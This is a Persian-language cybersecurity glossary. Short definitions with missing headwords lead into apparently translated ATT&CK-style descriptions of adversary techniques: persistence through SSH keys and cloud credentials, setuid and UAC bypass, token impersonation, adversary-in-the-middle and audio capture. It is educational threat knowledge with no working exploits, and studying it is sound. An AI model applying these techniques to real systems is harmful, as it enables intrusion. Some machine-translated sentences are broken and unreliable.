نرم افزاری است که وقتی کاربر آفلاین است، مطالب را به طور خودکار نمایش داده یا بارگیری می‌کند.

این‌ها برنامه‌های مخربی هستند که از طریق دستگاه‌های ذخیره سازی خارجی اجرا می‌شوند. این برنامه‌ها از ویژگی autorun ویندوز استفاده می‌کنند، بنابراین به عنوان کرم autorun شناخته می‌شوند.

هنگامی که یک کاربر غیرمجاز به شبکه حمله می‌کند، برای مدت زمان طولانی می‌ماند و بدون آسیب‌رساندن به شبکه، داده‌ها را سرقت می‌کند.

بردار حمله حامل یا وسیله‌ای است که از طریق آن هکرها به سیستم‌های هدف خود حمله می‌کنند. بردار حمله می‌تواند پیوست ایمیل آلوده، پیوند مخرب، پنجره‌های بازشو و ... باشد.

روشی که در آن هویت کاربر تأیید می‌شود.

داشتن کنترل نهایی بر روی هر سیستم معین.

نرم افزاری است که برای جلوگیری، حذف و تشخیص بدافزارهای مضر استفاده می‌شود و امنیت را در برابر تهدیدهای متعدد، نه تنها ویروس‌های رایانه‌ای، تأمین می‌کند.

مدیریت دارایی‌های امنیت سایبری شامل فرایند شناسایی و دارایی‌های فناوری اطلاعاتی است که سازمان‌ها در اختیار دارند و خطرات احتمالی امنیتی یا شکاف‌هایی که بر هر یک تأثیر می‌گذارد. این دارایی‌ها می‌توانند دستگاه‌های سنتی مانند رایانه‌های شخصی و سرورها باشند.

در دسترس بودن به معنی حفاظت از عملکرد سیستم‌های پشتیبانی است و اطمینان از دسترسی کامل داده‌ها در برهه زمانی (یا الزامات دوره) زمانی که مورد نیاز کاربران است. هدف از در دسترس بودن این است که اطمینان حاصل شود که داده‌ها برای استفاده در زمان تصمیم‌گیری مورد نیاز است.

معماری امنیت سایبری پایه دفاع سازمان‌ها در برابر تهدیدات سایبری است و تضمین می‌کند که همه اجزای زیرساخت فناوری اطلاعات آن محافظت می‌شود. محیط‌هایی که با معماری امنیت سایبری ایمن شده‌اند عبارتند از: شبکه‌های اینترنت اشیا.

حملات به عنوان سرویس، بدافزار به عنوان سرویس و کلاهبرداری به عنوان سرویس همه اصطلاحاتی هستند که معمولاً برای ارائه فعالیت‌های غیرقانونی توسط مجرمان سایبری استفاده می‌شوند.

بررسی دقیق هر مورد پیچیده‌ای به منظور درک ماهیت آن یا تعیین ویژگی‌های اساسی آن.

تدوین رویکردی مبتنی بر تاثیر احتمالی روی افراد عادی و فناوری خاص مورد نظر

پروسه تهیه کپی پس از مصادره شواهد جرم. یک کپی بسیار دقیق در سطح سکتور از رسانه مورد نظر معمولا با استفاده از دستگاه Write گرفته می‌شود.

هوش مصنوعی برای تشخیص تهدیدها، تسریع در سرعت پاسخگویی آن و جلوگیری از حملات مفید است

ریسکی که احتمال وقوع حادثه یا قرار گرفتن در معرض خطر و شدت صدمه‌ای که ممکن است ناشی از آن باشد به همان اندازه که امکان پذیر است و در شرایطی که در نظر گرفته می‌شود قابل تحمل است.

دشمنان ممکن است زیرساخت‌هایی را خریداری یا اجاره کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. طیف گسترده‌ای از زیرساخت‌ها برای میزبانی و سازماندهی عملیات دشمن وجود دارند. راه حل‌های زیرساختی شامل سرورهای فیزیکی یا ابری، دامنه‌ها و خدمات وب شخص ثالث می‌باشد. علاوه بر این، بات نت‌ها برای اجاره یا خرید در دسترس هستند. استفاده از این راه‌حل‌های زیرساختی به دشمن اجازه می‌دهد تا عملیاتی را مرحله‌بندی‌، راه‌اندازی و اجرا کند. راه‌حل‌ها ممکن است به عملیات متخاصم کمک کند تا با ترافیکی که معمولی به نظر می‌رسد ترکیب شود، مانند تماس با سرویس‌های وب شخص ثالث. بسته به نحوه اجرا، دشمنان ممکن است از زیرساخت‌هایی استفاده کنند که اتصال فیزیکی به آنها را دشوار می‌کند و همچنین از زیرساخت‌هایی که می‌توانند به سرعت تأمین، اصلاح و تعطیل شود، استفاده کنند.

لگوهای حمله توصیف ویژگی‌ها و رویکردهای متداول مورد استفاده دشمنان برای بهره‌برداری از ضعف‌های شناخته شده در قابلیت‌های فعال در فضای مجازی است. الگوهای حمله چالش‌هایی را که ممکن است دشمن با آن روبرو شود و نحوه حل آن را مشخص می‌کند. هر الگوی حمله اطلاعاتی در مورد نحوه طراحی و اجرای بخش‌های خاصی از حمله به دست می‌آورد و در مورد راه‌های کاهش اثربخشی حمله راهنمایی می‌کند.

دشمنان ممکن است دامنه‌هایی را خریداری کنند که می‌توانند در هنگام هدف‌گیری از آنها استفاده کنند. نام‌های دامنه، نام‌های قابل خواندن توسط انسان هستند که برای نشان دادن یک یا چند آدرس IP استفاده می‌شوند. آنها را می‌توان خریداری کرد یا در برخی موارد به صورت رایگان خریداری کرد. دشمنان می‌توانند از دامنه‌های خریداری‌شده برای مقاصد مختلف، از جمله برای فیشینگ، Drive-by Compromise وCommand and Control استفاده کنند. دشمنان ممکن است دامنه‌هایی را انتخاب کنند که شبیه به دامنه‌های قانونی هستند، از جمله از طریق استفاده از هموگلیف‌ها یا استفاده از یک دامنه سطح بالا.

دشمنان ممکن است سرورهای سیستم نام دامنه (DNS) خود را راه‌اندازی کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. در طول فعالیت پس از سازش، دشمنان ممکن است از ترافیک DNS برای وظایف مختلف، از جمله برای فرمان و کنترل (مثلاً پروتکل لایه برنامه) استفاده کنند. به جای ربودن سرورهای DNS موجود، دشمنان ممکن است برای پشتیبانی از عملیات، سرورهای DNS خود را پیکربندی و اجرا کنند. با اجرای سرورهای DNS خود، دشمنان می‌توانند کنترل بیشتری بر نحوه مدیریت ترافیک DNS C2 سمت سرور ( DNS) داشته باشند. با کنترل سرور DNS، دشمنان می‌توانند برنامه‌های DNS را برای ارائه پاسخ‌های مشروط به بدافزار پیکربندی کنند و به طور کلی، انعطاف‌پذیری بیشتری در ساختار کانال C2مبتنی بر DNS داشته باشند.

دشمنان ممکن است سرورهای خصوصی مجازی (VPS) را اجاره کنند که می‌توانند در هنگام هدف‌گیری استفاده شوند. ارائه دهندگان خدمات ابری مختلفی وجود دارند که ماشین‌های مجازی/کانتینرها را به عنوان یک سرویس می‌فروشند. با استفاده ازVPS، دشمنان می‌توانند پیوند فیزیکی عملیات را با آنها دشوار کنند. استفاده از زیرساخت‌های ابری همچنین می‌تواند تدارک سریع، اصلاح و خاموش کردن زیرساخت‌های خود را برای دشمنان آسان‌تر کند. به دست آوردن یک VPSبرای استفاده در مراحل بعدی چرخه حیات دشمن، مانند فرمان و کنترل، می تواند به دشمنان اجازه دهد از همه‌جا و اعتماد مرتبط با ارائه دهندگان خدمات ابری با شهرت بالاتر بهره مند شوند. دشمنان همچنین می‌توانند زیرساخت‌هایی را از ارائه‌دهندگان خدمات VPS که برای اجاره VPS با حداقل اطلاعات ثبت‌نام شناخته شده‌اند، به دست آورند، که امکان خرید ناشناس بیشتر زیرساخت‌ها را فراهم می‌کند.

دشمنان ممکن است سرورهای فیزیکی را بخرند، اجاره کنند یا کرایه کنند که می‌توانند در هنگام هدف‌گیری از آنها استفاده کنند. استفاده از سرورها به حریف اجازه می‌دهد تا عملیات را مرحله بندی، راه اندازی و اجرا کند. در طول فعالیت پس از سازش، دشمنان ممکن است از سرورها برای کارهای مختلف از جمله برای فرماندهی و کنترل استفاده کنند. به جای به خطر انداختن یک سرور شخص ثالث یا اجاره یک سرور خصوصی مجازی، ممکن است دشمنان برای پشتیبانی از عملیات، سرورهای خود را پیکربندی و اجرا کنند. دشمنان ممکن است فقط به یک راه‌اندازی سبک وزن نیاز داشته باشند که بیشتر فعالیت‌های آنها با استفاده از زیرساخت آنلاین انجام شود. یا اگر بخواهند سایر جنبه‌های فعالیت‌های خود را در سیستم‌های خود آزمایش، برقراری ارتباط و کنترل کنند، ممکن است نیاز به ایجاد زیرساخت‌های گسترده داشته باشند.

دشمنان ممکن است شبکه‌ای از سیستم‌های در معرض خطر را بخرند، اجاره کنند یا اجاره کنند که می‌توان از آنها در هنگام هدف‌گیری استفاده کرد. بات‌نت شبکه‌ای از سیستم‌های در معرض خطر است که می‌توان برای انجام وظایف هماهنگ دستور داد. دشمنان ممکن است برای استفاده از بات نت موجود از یک سرویس راه انداز/استرس، اشتراک خریداری کنند. با داشتن یک بات نت در اختیار دشمنان، ممکن است فعالیت‌های بعدی مانند فیشینگ در مقیاس بزرگ یا انکار سرویس توزیع شده ( DDoS) را انجام دهند.

دشمنان ممکن است برای سرویس‌های وب که می‌توانند در هنگام هدف‌گیری استفاده شوند ثبت نام کنند. انواع وب سایت‌های محبوب برای دشمنان وجود دارد تا برای یک سرویس مبتنی بر وب ثبت نام کنند که می‌تواند در مراحل بعدی چرخه حیات دشمن مورد سوء استفاده قرار گیرد، مانند هنگام فرماندهی و کنترل (وب سرویس) یا Exfiltration Over Web Service استفاده از سرویس‌های رایج، مانند سرویس‌هایی که توسط گوگل یا توییتر ارائه می‌شود، مخفی شدن در نویز مورد انتظار را برای دشمنان آسان‌تر می‌کند. با استفاده از یک وب سرویس، دشمنان می توانند پیوند فیزیکی عملیات را با آنها دشوار کنند.

دشمنان ممکن است اسکن‌های شناسایی فعال را برای جمع‌آوری اطلاعاتی که در هنگام هدف‌گیری استفاده می‌شود، انجام دهند. اسکن‌های فعال آنهایی هستند که در آن دشمن از زیرساخت‌های قربانیان از طریق ترافیک شبکه کاوش می‌کند، در مقایسه با سایر روش‌های شناسایی که تعامل مستقیم را شامل نمی‌شود. بسته به اطلاعاتی که می‌خواهند جمع‌آوری کنند، دشمنان ممکن است انواع مختلفی از اسکن فعال را انجام دهند. این اسکن‌ها همچنین می‌توانند به روش‌های مختلف انجام شوند، از جمله استفاده از ویژگی‌های بومی پروتکل‌های شبکه مانندICMP . اطلاعات حاصل از این اسکن‌ها ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها/دامنه‌های باز یا جستجو در پایگاه‌های اطلاعات فنی باز)، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و/یا دسترسی اولیه (مانند: کنترل از راه دور خارجی)

دشمنان ممکن است حساب ها را برای حفظ دسترسی به سیستم های قربانی دستکاری کنند. دستکاری حساب ممکن است شامل هر اقدامی باشد که دسترسی دشمن را به یک حساب در معرض خطر حفظ می‌کند، مانند اصلاح اعتبار یا گروه‌های مجوز. این اقدامات همچنین می‌تواند شامل فعالیت حساب باشد که برای برهم زدن خط‌مشی‌های امنیتی طراحی شده است، مانند انجام به‌روزرسانی‌های تکراری رمز عبور برای دور زدن خط‌مشی‌های مدت زمان رمز عبور و حفظ عمر اعتبارنامه‌های در معرض خطر. برای ایجاد یا دستکاری حساب‌ها، حریف باید از قبل مجوزهای کافی روی سیستم‌ها یا دامنه داشته باشد.

دشمنان ممکن است اعتبارنامه های کنترل شده توسط دشمن را به یک حساب ابری اضافه کنند تا دسترسی دائمی به حساب های قربانی و نمونه های موجود در محیط را حفظ کنند. دشمنان می‌توانند علاوه بر اعتبارنامه‌های قانونی موجود در Azure AD، اعتبارنامه‌هایی را برای اصول سرویس و برنامه‌های کاربردی اضافه کنند، این اعتبارنامه ها شامل کلیدهای X509و رمزهای عبور می شود. با مجوزهای کافی، راه‌های مختلفی برای افزودن اعتبارنامه‌ها از جمله پورتال Azure، رابط خط فرمان Azure، و ماژول‌های Azure یا Az PowerShell وجود دارد. در محیط‌های زیرساخت به‌عنوان سرویس (IaaS) ، پس از دسترسی از طریق حساب‌های ابری، دشمنان ممکن است کلیدهای SSH خود را با استفاده از CreateKeyPair یا ImportKeyPair API در AWS یا دستور add gcloud os-login ssh-keys تولید یا وارد کنند. در GCP این امکان دسترسی مداوم به نمونه‌های موجود در محیط ابری را بدون استفاده بیشتر از حساب‌های ابری در معرض خطر فراهم می‌کند.

دشمنان ممکن است سطوح مجوز اضافی مانند ReadPermission یا FullAccess را برای حفظ دسترسی دائمی به یک حساب ایمیل تحت کنترل دشمن اعطا کنند. Add-MailboxPermission PowerShell cmdlet، موجود در Exchange on-premises و در سرویس مبتنی بر ابر Office365 مجوزها را به صندوق پستی اضافه می کند. دشمنان همچنین ممکن است مجوزهای پوشه صندوق پستی را از طریق مجوزها یا نقش های پوشه فردی اختصاص دهند. دشمنان ممکن است مجوزها یا نقش‌های کاربر پیش‌فرض یا ناشناس را به پوشه‌های Top of Information Store (root)، Inbox یا سایر پوشه‌های صندوق پستی اختصاص دهند. با اختصاص دادن یک یا هر دو مجوز کاربر به یک پوشه، حریف می‌تواند از هر حساب دیگری در مستاجر برای حفظ ماندگاری پوشه‌های ایمیل کاربر هدف استفاده کند. این ممکن است در حوادث تهدید مداوم و همچنین حوادث BEC استفاده شود که در آن دشمن می تواند حقوق دسترسی بیشتری را به حساب هایی که می خواهد به خطر بیاندازد اختصاص دهد. این ممکن است استفاده از تکنیک های اضافی را برای دستیابی به سیستم ها امکان پذیر کند. به عنوان مثال، حساب‌های تجاری در معرض خطر اغلب برای ارسال پیام‌ها به حساب‌های دیگر در شبکه کسب‌وکار مورد نظر در حین ایجاد قوانین صندوق ورودی (مثلاً Spearphishing داخلی)، استفاده می‌شوند، بنابراین پیام‌ها از مکانیسم‌های تشخیص هرزنامه/فیشینگ اجتناب می‌کنند.

یک دشمن ممکن است نقش مدیر جهانی را به حسابی که توسط دشمن کنترل می‌شود اضافه کند تا دسترسی دائمی به مستاجر Office365را حفظ کند. با مجوزهای کافی، یک حساب در معرض خطر می‌تواند دسترسی تقریباً نامحدودی به داده‌ها و تنظیمات (از جمله قابلیت بازنشانی گذرواژه‌های سایر مدیران) از طریق نقش مدیر جهانی داشته باشد. این تغییر حساب ممکن است بلافاصله به دنبال ایجاد حساب یا سایر فعالیت‌های مخرب حساب باشد.

دشمنان ممکن است فایل SSH authorized_keys را برای حفظ پایداری روی میزبان قربانی تغییر دهند. توزیع‌های لینوکس و macOS معمولاً از احراز هویت مبتنی بر کلید برای ایمن کردن فرآیند احراز هویت جلسات SSH برای مدیریت از راه دور استفاده می‌کنند. فایل authorized_keys در SSH کلیدهای SSH را مشخص می کند که می توانند برای ورود به حساب کاربری که فایل برای آن پیکربندی شده است استفاده شود. این فایل معمولاً در فهرست اصلی کاربر در زیر<user-home>/.ssh/authorized_keys یافت می شود. کاربران می‌توانند فایل پیکربندی SSH سیستم را ویرایش کنند تا دستورالعمل‌های PubkeyAuthentication و RSAAAuthentication را به مقدار " "yes تغییر دهند تا مطمئن شوند که کلید عمومی و احراز هویت RSA فعال هستند. فایل پیکربندی SSH معمولاً در زیر /etc/ssh/sshd_config قرار دارد. دشمنان ممکن است فایل‌های SSH authorized_keys را مستقیماً با اسکریپت ها یا دستورات پوسته تغییر دهند تا کلیدهای عمومی ارائه شده توسط دشمن خود را اضافه کنند. این تضمین می کند که دشمنی که کلید خصوصی مربوطه را در اختیار دارد می تواند به عنوان یک کاربر موجود از طریق SSH وارد شود.

دشمنان ممکن است مکانیسم های طراحی شده برای کنترل امتیازات بالا را برای به دست آوردن مجوزهای سطح بالاتر دور بزنند. اکثر سیستم‌های مدرن دارای مکانیسم‌های کنترل ارتفاع بومی هستند که هدف آن محدود کردن امتیازاتی است که کاربر می‌تواند روی یک ماشین انجام دهد. مجوز باید به کاربران خاصی اعطا شود تا کارهایی را انجام دهند که می تواند ریسک بالاتری در نظر گرفته شود. یک دشمن می تواند چندین روش را برای استفاده از مکانیسم های کنترل داخلی به منظور افزایش امتیازات در یک سیستم انجام دهد.

حریف ممکن است با استفاده از بیت‌های setsuid یا setgid از آسیب‌پذیری‌های پوسته استفاده کند یا از آسیب‌پذیری‌های موجود در یک برنامه برای اجرای کد در زمینه کاربر دیگر استفاده کند. در لینوکس یا macOS، وقتی بیت‌های setuid یا setgid برای یک برنامه تنظیم می‌شوند، برنامه به ترتیب با امتیازات کاربر یا گروه مالک اجرا می‌شود. به طور معمول یک برنامه در زمینه کاربر فعلی اجرا می شود، صرف نظر از اینکه کدام کاربر یا گروه مالک برنامه است. با این حال، مواردی وجود دارد که برنامه‌ها باید در یک زمینه بالا اجرا شوند تا به درستی کار کنند، اما کاربری که آنها را اجرا می‌کند به امتیازات بالا نیاز ندارد. به جای ایجاد یک ورودی در فایل sudoers، که باید توسط روت انجام شود، هر کاربری می تواند پرچم setuid یا setgid را برای برنامه های خود تعیین کند. این بیت ها در هنگام مشاهده ویژگی های فایل از طریق ls –l به جای x با یک "s" نشان داده می شوند. برنامه chmod می‌تواند این بیت‌ها را با via bitmasking، chmod 4777 [file] تنظیم کند. دشمنان می توانند از این مکانیسم بر روی بدافزار خود استفاده کنند تا مطمئن شوند که در آینده قادر به اجرا در زمینه های بالا هستند.

دشمنان ممکن است مکانیسم های UAC را دور بزنند تا امتیازات فرآیند را در سیستم افزایش دهند. (UAC) به یک برنامه اجازه می‌دهد تا امتیازات خود را (که به صورت سطوح یکپارچگی از پایین به بالا دنبال می‌شود) برای انجام یک کار تحت مجوزهای سطح سرپرست، احتمالاً با درخواست از کاربر برای تأیید، افزایش دهد. تأثیر آن بر کاربر از انکار عملیات تحت اجرای بالا تا اجازه دادن به کاربر برای انجام این عمل در صورتی که در گروه مدیران محلی باشد و از طریق فرمان کلیک کند یا اجازه دادن به آنها برای وارد کردن رمز عبور سرپرست برای تکمیل عمل، انجام شود. اگر سطح حفاظت UAC یک رایانه روی چیزی جز بالاترین سطح تنظیم شده باشد، برخی از برنامه‌های ویندوز می‌توانند امتیازات را افزایش دهند یا برخی از اشیاء مدل شیء کامپوننت بالا را بدون درخواست از کاربر از طریق جعبه اعلان UAC اجرا کنند. یک مثال از این استفاده از برای بارگیری یک DLL ساخته شده خاص است که یک شیء مدل شیء کامپوننت با ارتفاع خودکار را بارگیری می کند و یک عملیات فایل را در یک دایرکتوری محافظت شده انجام می دهد که معمولاً به دسترسی بالا نیاز دارد. همچنین ممکن است نرم افزارهای مخرب به یک فرآیند قابل اعتماد تزریق شود تا بدون درخواست کاربر، امتیازات بیشتری به دست آورد. روش های زیادی برای دور زدن UAC کشف شده است. صفحه Github readme برای UACME شامل فهرست گسترده‌ای از روش‌ها است که کشف و پیاده‌سازی شده‌اند، اما ممکن است فهرست جامعی از بای‌پس‌ها نباشد. روش های بای پس اضافی به طور منظم کشف می شوند و برخی در طبیعت مورد استفاده قرار می گیرند، مانند: eventvwr.exe می‌تواند به صورت خودکار یک باینری یا اسکریپت مشخص را بالا ببرد و اجرا کند. در صورتی که اعتبار یک حساب کاربری با امتیازات مدیر شناخته شده باشد، از طریق برخی از تکنیک‌های حرکت جانبی امکان‌پذیر است، زیرا UAC یک مکانیسم امنیتی سیستم واحد است و امتیاز یا یکپارچگی فرآیندی که در یک سیستم اجرا می‌شود در سیستم‌های راه دور ناشناخته خواهد بود و به‌طور پیش‌فرض صداقت بالا.

دشمنان ممکن است sudo caching را انجام دهند و یا از فایل suoders برای بالا بردن امتیازات استفاده کنند. دشمنان ممکن است این کار را برای اجرای دستورات به عنوان سایر کاربران یا ایجاد فرآیندهایی با امتیازات بالاتر انجام دهند. در سیستم‌های لینوکس و MacOS، sudo گاهی اوقات به عنوان "superuser do" نامیده می‌شود) به کاربران اجازه می‌دهد تا دستورات را از ترمینال‌هایی با امتیازات بالا انجام دهند و کنترل کنند که چه کسی می‌تواند این دستورات را روی سیستم انجام دهد. دستور sudoبه مدیر سیستم اجازه می‌دهد تا به کاربران خاصی (یا گروه‌هایی از کاربران) توانایی اجرای برخی (یا همه) دستورات را به‌عنوان کاربر اصلی یا کاربر دیگر در حالی که دنباله حسابرسی از دستورات و آرگومان‌های آن‌ها ارائه می‌کند، تفویض کند. از آنجایی که sudo برای مدیر سیستم ساخته شده است، دارای برخی از ویژگی های پیکربندی مفید مانند timestamp_timeout است، که مقدار زمانی است که در چند دقیقه بین نمونه های sudo قبل از درخواست مجدد رمز عبور است. این به این دلیل است که sudo این قابلیت را دارد که اعتبارنامه‌ها را برای یک دوره زمانی کش کند. Sudo فایلی را در /var/db/sudo ایجاد می‌کند (یا لمس می‌کند) با یک مهر زمانی از آخرین اجرای sudo برای تعیین این زمان. علاوه بر این، یک متغیر timestamp_timeoutوجود دارد که هر tty جدید (جلسه پایانی) را به صورت مجزا بررسی می کند. این به این معنی است که، برای مثال، مهلت زمانی sudo یک tty روی tty دیگر تأثیری نخواهد داشت.

دشمنان ممکن است از API AuthorizationExecuteWithPrivileges برای افزایش امتیازات با درخواست از کاربر برای دریافت اعتبار استفاده کنند. هدف از این API این است که به توسعه دهندگان برنامه یک راه آسان برای انجام عملیات با امتیازات ریشه، مانند نصب یا به روز رسانی برنامه، بدهد. این API تأیید نمی کند که برنامه درخواست کننده امتیازات ریشه از یک منبع معتبر می آید یا به طور مخرب اصلاح شده است. اگرچه این API منسوخ شده است، اما همچنان در آخرین نسخه‌های macOS به طور کامل عمل می‌کند. هنگام فراخوانی این API، از کاربر خواسته می شود تا اطلاعات کاربری خود را وارد کند، اما هیچ بررسی در مورد منشاء یا یکپارچگی برنامه انجام نمی شود. برنامه ای که API را فراخوانی می کند ممکن است فایل های قابل نوشتن جهان را نیز بارگیری کند که می توانند برای انجام رفتارهای مخرب با امتیازات بالا تغییر داده شوند. دشمنان ممکن است از AuthorizationExecuteWithPrivileges برای به دست آوردن امتیازات ریشه به منظور نصب نرم افزارهای مخرب بر روی قربانیان و نصب مکانیسم‌های پایدار سوء استفاده کنند. این تکنیک ممکن است با Masquerading ترکیب شود تا کاربر را فریب دهد تا امتیازات فزاینده‌ای به کدهای مخرب بدهد. همچنین نشان داده شده است که این تکنیک با اصلاح برنامه های قانونی موجود در دستگاهی که از این API استفاده می کند، کار می کند.

دشمنان ممکن است توکن‌های دسترسی را تغییر دهند تا تحت یک زمینه امنیتی کاربر یا سیستم متفاوت عمل کنند تا اقدامات را انجام دهند و کنترل های دسترسی را دور بزنند. ویندوز از نشانه های دسترسی برای تعیین مالکیت یک فرآیند در حال اجرا استفاده می کند. یک کاربر می‌تواند توکن‌های دسترسی را دستکاری کند تا فرآیند در حال اجرا به نظر برسد که گویی فرزند فرآیند دیگری است یا متعلق به شخصی غیر از کاربر است که فرآیند را آغاز کرده است. هنگامی که این اتفاق می افتد، فرآیند همچنین زمینه امنیتی مرتبط با توکن جدید را به خود می گیرد. حریف می‌تواند از توابع API داخلی ویندوز برای کپی کردن نشانه های دسترسی از فرآیندهای موجود استفاده کند. این به عنوان سرقت رمز شناخته می شود. سپس می‌توان این توکن‌ها را روی یک فرآیند موجود اعمال کرد (یعنی جعل هویت / سرقت) یا برای ایجاد یک فرآیند جدید (یعنی ایجاد فرآیند با توکن) استفاده کرد. یک حریف باید قبلاً در یک زمینه کاربری ممتاز (یعنی مدیر) برای سرقت یک توکن باشد. با این حال، دشمنان معمولاً از سرقت رمز استفاده می‌کنند تا زمینه امنیتی خود را از سطح مدیر به سطح SYSTEM ارتقا دهند. اگر حساب دارای مجوزهای مناسب در سیستم راه دور باشد، یک دشمن می‌تواند از یک رمز برای احراز هویت به یک سیستم راه دور به عنوان حساب آن نشانه استفاده کند. هر کاربر استاندارد می تواند از دستور runas و توابع Windows API برای ایجاد نشانه های جعل هویت استفاده کند. نیازی به دسترسی به حساب مدیر نیست. همچنین مکانیسم‌های دیگری مانند فیلدهای Active Directory وجود دارد که می‌توان از آنها برای اصلاح توکن‌های دسترسی استفاده کرد.

دشمنان ممکن است برای افزایش امتیازات و دور زدن کنترل‌های دسترسی، توکن کاربر دیگری را کپی کرده و جعل هویت کنند. یک حریف می تواند یک توکن دسترسی جدید ایجاد کند که با استفاده از DuplicateToken(Ex) یک توکن موجود را کپی می‌کند. سپس این توکن را می‌توان با ImpersonateLoggedOnUser استفاده کرد تا به رشته فراخوانی اجازه دهد تا جعل هویت کاربر ثبت‌شده در زمینه امنیتی کاربر، یا با SetThreadTokenبرای تخصیص رمز جعل شده به یک رشته استفاده شود. یک حریف ممکن است این کار را زمانی انجام دهد که یک فرآیند خاص و موجود داشته باشد که می خواهد توکن جدید را به آن اختصاص دهد. به عنوان مثال، این ممکن است برای زمانی مفید باشد که کاربر هدف یک جلسه لاگین غیر شبکه در سیستم داشته باشد.

دشمنان ممکن است یک فرآیند جدید با یک توکن متفاوت برای افزایش امتیازات و دور زدن کنترل‌های دسترسی ایجاد کنند. فرآیندها را می توان با توکن و زمینه امنیتی ناشی از کاربر دیگر با استفاده از ویژگی هایی مانند CreateProcessWithTokenW و runa ایجاد کرد. ایجاد فرآیندها با یک نشانه متفاوت ممکن است به اعتبار کاربر هدف، امتیازات خاص برای جعل هویت کاربر، یا دسترسی به رمز مورد استفاده نیاز داشته باشد (مثلاً: جمع آوری شده از طریق ابزارهای دیگری مانند جعل هویت / سرقت یا ساخت و جعل نماد).

دشمنان ممکن است برای افزایش امتیازات و دور زدن کنترل‌های دسترسی، توکن‌هایی بسازند و جعل هویت کنند. اگر حریف نام کاربری و رمز عبور داشته باشد اما کاربر وارد سیستم نشده باشد، دشمن می‌تواند با استفاده از عملکرد LogonUser یک جلسه ورود به سیستم برای کاربر ایجاد کند. این تابع یک کپی از نشانه دسترسی جلسه جدید را برمی گرداند و حریف می تواند از SetThreadToken برای اختصاص رمز به یک رشته استفاده کند.

دشمنان ممکن است شناسه فرآیند والد (PPID )یک فرآیند جدید را برای فرار از دفاع نظارت بر فرآیند یا افزایش امتیازات جعل کنند. فرآیندهای جدید معمولاً مستقیماً از فرآیند والد یا فراخوانی ایجاد می شوند مگر اینکه به صراحت مشخص شده باشد. یکی از راه‌های تخصیص صریح PPID یک فرآیند جدید، از طریق فراخوانی CreateProcess API است که از پارامتری پشتیبانی می‌کند که PPID مورد استفاده را تعریف می‌کند. این قابلیت توسط ویژگی‌های ویندوز مانند کنترل حساب کاربری (UAC)برای تنظیم صحیح PPID پس از ایجاد یک فرآیند بالا درخواست شده توسط سیستم معمولاً از طریق svchost.exe یا consent.exeبه جای زمینه کاربر فعلی استفاده می‌شود.

دشمنان ممکن است از SID-History Injection برای افزایش امتیازات و دور زدن کنترل های دسترسی استفاده کنند. شناسه امنیتی ویندوز (SID) یک مقدار منحصر به فرد است که یک حساب کاربری یا گروه را شناسایی می کند. SIDها توسط امنیت ویندوز هم در توصیفگرهای امنیتی و هم در توکن های دسترسی استفاده می شوند. یک حساب می‌تواند SID‌های اضافی را در ویژگی SID-History Active Directory attribute نگه دارد، که امکان مهاجرت حساب‌های قابل‌عملکرد بین دامنه‌ها را فراهم می‌کند (به عنوان مثال، همه مقادیر در SID-History در نشانه‌های دسترسی گنجانده شده‌اند). با حقوق سرپرست دامنه (یا معادل آن)، مقادیر SID استخراج شده یا شناخته شده ممکن است در SID-History درج شود تا جعل هویت کاربران/گروه های دلخواه مانند مدیران سازمانی امکان پذیر شود. این دستکاری ممکن است منجر به افزایش دسترسی به منابع محلی و/یا دسترسی به دامنه‌های غیرقابل دسترس از طریق تکنیک‌های حرکت جانبی مانند سرویس‌های راه دور، اشتراک‌های مدیریت SMB/Windows یا مدیریت از راه دور ویندوز شود.

دشمنان ممکن است با استفاده از تکنیک خصمانه در وسط (AiTM) برای پشتیبانی از رفتارهای بعدی مانند Sniffing شبکه یا دستکاری داده های انتقال یافته، سعی کنند خود را بین دو یا چند دستگاه شبکه قرار دهند. با سوء استفاده از ویژگی‌های پروتکل‌های شبکه رایج که می‌توانند جریان ترافیک شبکه را تعیین کنند (مانند ARP، DNS، LLMNR، و غیره)، دشمنان ممکن است دستگاه را مجبور به برقراری ارتباط از طریق یک سیستم کنترل‌شده توسط دشمن کنند تا بتوانند اطلاعات را جمع‌آوری کنند یا اقدامات اضافی را انجام دهند.دشمنان ممکن است از موقعیت AiTM برای تغییر ترافیک استفاده کنند، مانند دستکاری داده های انتقال یافته. دشمنان همچنین می توانند از جریان ترافیک به مقصد مناسب جلوگیری کنند و باعث انکار سرویس شوند.

دشمنان ممکن است تلاش کنند تا فهرستی از حساب ها را در یک سیستم یا در یک محیط دریافت کنند. این اطلاعات می تواند به دشمنان کمک کند تا تعیین کنند کدام حساب ها برای کمک به رفتارهای بعدی وجود دارند.

ممکن است دشمنان سعی کنند فهرستی از پنجره های برنامه باز را دریافت کنند. فهرست‌های پنجره‌ای می‌توانند اطلاعاتی را در مورد نحوه استفاده از سیستم منتقل کنند یا به اطلاعات جمع‌آوری‌شده توسط یک کی‌لاگر زمینه بدهند

دشمن ممکن است داده‌هایی را که قبل از استخراج جمع‌آوری شده است فشرده و یا رمزگذاری کند. فشرده سازی داده ها می تواند به مبهم سازی داده های جمع آوری شده و به حداقل رساندن مقدار داده‌های ارسال شده از طریق شبکه کمک کند. از رمزگذاری می‌توان برای پنهان کردن اطلاعاتی استفاده کرد که از شناسایی خارج می‌شوند یا پس از بازرسی توسط مدافع، نفوذ را کمتر نمایان می‌کند.هم فشرده سازی و هم رمزگذاری قبل از خروج انجام می شود و می توان با استفاده از ابزار، کتابخانه شخص ثالث یا روش سفارشی انجام داد.

یک دشمن می‌تواند از دستگاه‌های جانبی رایانه (مانند میکروفون و وب‌کم) یا برنامه‌های کاربردی (مانند خدمات تماس صوتی و تصویری) برای ضبط صداهای ضبط‌شده به منظور گوش دادن به مکالمات حساس برای جمع‌آوری اطلاعات استفاده کند. بدافزارها یا اسکریپت‌ها ممکن است برای تعامل با دستگاه‌ها از طریق یک API موجود ارائه شده توسط سیستم عامل یا برنامه‌ای برای ضبط صدا استفاده شوند. فایل‌های صوتی ممکن است روی دیسک نوشته شده و بعداً استخراج شوند.

